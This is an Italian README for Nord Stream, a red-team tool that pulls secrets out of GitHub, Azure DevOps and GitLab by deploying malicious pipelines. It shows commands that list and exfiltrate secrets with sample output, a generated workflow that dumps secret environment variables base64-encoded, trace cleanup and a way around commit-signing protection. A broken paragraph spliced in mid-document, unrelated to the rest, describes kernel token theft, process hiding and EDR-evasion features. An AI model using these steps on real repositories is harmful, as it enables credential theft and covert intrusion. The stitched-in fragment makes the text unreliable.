
Nord Stream è uno strumento che consente di estrarre i segreti memorizzati all'interno degli ambienti CI/CD distribuendo pipeline dannose. Attualmente supporta Azure DevOps, GitHub e GitLab.
Nord Stream è uno strumento che consente di estrarre i segreti memorizzati all'interno degli ambienti CI/CD distribuendo pipeline maliziose.
Attualmente supporta Azure DevOps, GitHub e GitLab.
Scopri di più nel seguente post del blog: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks
$ pipx install git+https://github.com/synacktiv/nord-stream
`git` è inoltre richiesto (vedi https://git-scm.com/download/) e deve essere presente nel tuo `PATH`.
## Utilizzo
Ecco un semplice esempio su GitHub; inizialmente, è possibile enumerare i vari segreti.```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
- REPO_SECRET
- SUPER_SECRET
[*] PROD secrets:
- PROD_SECRET
Quindi procedere all'esfiltrazione:```sh
$ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo"
[] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[] Getting secrets from repo: "org/repo"
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_SUPER_SECRET=value for super secret
secret_REPO_SECRET=repository secret
[] Getting secrets from environment: "PROD" (org/repo) [] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_PROD_SECRET=Value only accessible from prod environment
[] Cleaning logs. [] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github
### Argomenti condivisi
Alcuni argomenti sono condivisi tra [GitHub](#github), [Azure DevOps](#azure-devops) e [GitLab](#gitlab); ecco alcuni esempi.
#### Descrivi il token
L'opzione `--describe-token` può essere utilizzata per visualizzare informazioni generali sul tuo token:```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
- Login: CICD
- IsAdmin: False
- Id: 1337
- Bio: None
L'opzione --build-yaml può essere utilizzata per creare un file di pipeline senza distribuirlo. Recupera i vari nomi dei segreti per costruire la pipeline associata, che può essere utilizzata per aggiungere passaggi personalizzati:```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml
[+] YAML file:
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
name: command
env:
secret_PROD_SECRET: ${{secrets.PROD_SECRET}}
environment: PROD
#### YAML
L'opzione `--yaml` può essere utilizzata per distribuire una pipeline personalizzata:```yml
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: echo "Hello from step 1"
name: step 1
- run: echo "Doing some important stuff here"
name: command
- run: echo "Hello from last step "
name: last step
ParseKProcess che analizza i processi kernel e opzionalmente li filtra per nome e intervalli di indirizzi. Questa funzionalità è accessibile dalla modalità processo kernel process.PsLoadedModuleList per visualizzare tutti i moduli kernel e i driver caricati. Si può accedere a questa modalità con modules.syscall). Opzione per mostrare solo le syscall SSDT e nascondere quelle Win32k.StealToken per rubare il token da qualsiasi processo e assegnarlo al processo corrente, inclusi i processi di sistema.RestoreKernelCallback attualmente ripristina ObpCallProcess, ObpCallThread e ObpCallProcessNotifyRoutineArray (con 10 punti di ripristino). Rimuove anche PsCallback per eludere il rilevamento EDR. Questa modalità è accessibile con callback.unprotect).ActiveProcessLinks e modificare il token dell'eprocess per elevare l'integrità a SYSTEM. Questa modalità è hide.FilterList e dalla AltitudesList del frame per eludere il rilevamento EDR tramite callback kernel (minifilter).```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --yaml custom.yml
[+] "synacktiv/repo"
[] No branch protection rule found on "dev_remote_ea5Eu/test/v1"branch
[] Running custom workflow: .../custom.yml
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Workflow output:
2023-07-18T20:08:33.0073670Z ##[group]Run echo "Doing some important stuff here"
2023-07-18T20:08:33.0074247Z echo "Doing some important stuff here"
2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0137261Z ##[endgroup]
2023-07-18T20:08:33.0422019Z Doing some important stuff here[] Cleaning logs. [] Check output: .../nord-stream-logs/github
Per impostazione predefinita, mostrerà l'output del task denominato `command` del job `init`, ma tutto viene archiviato localmente e può essere consultato manualmente:```bash
$ cat nord-stream-logs/github/synacktiv/repo/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt
2023-07-18T20:08:33.0458509Z ##[group]Run echo "Hello from last step "
2023-07-18T20:08:33.0459084Z echo "Hello from last step "
2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0511890Z ##[endgroup]
2023-07-18T20:08:33.0597853Z Hello from last step
Per impostazione predefinita, Nord Stream tenterà di rimuovere le tracce lasciate dopo la distribuzione di una pipeline, a seconda dei tuoi privilegi. Per preservare le tracce, è possibile utilizzare l'opzione --no-clean. Questo manterrà i log della pipeline, ma ripristinerà comunque le modifiche apportate al repository.
Nota che per GitLab, alcune tracce non possono essere eliminate.
Gli amministratori del repository possono imporre la firma obbligatoria dei commit su un ramo per bloccare tutti i commit che non sono firmati e verificati. Con Nord Stream è possibile firmare i commit per aggirare tale protezione.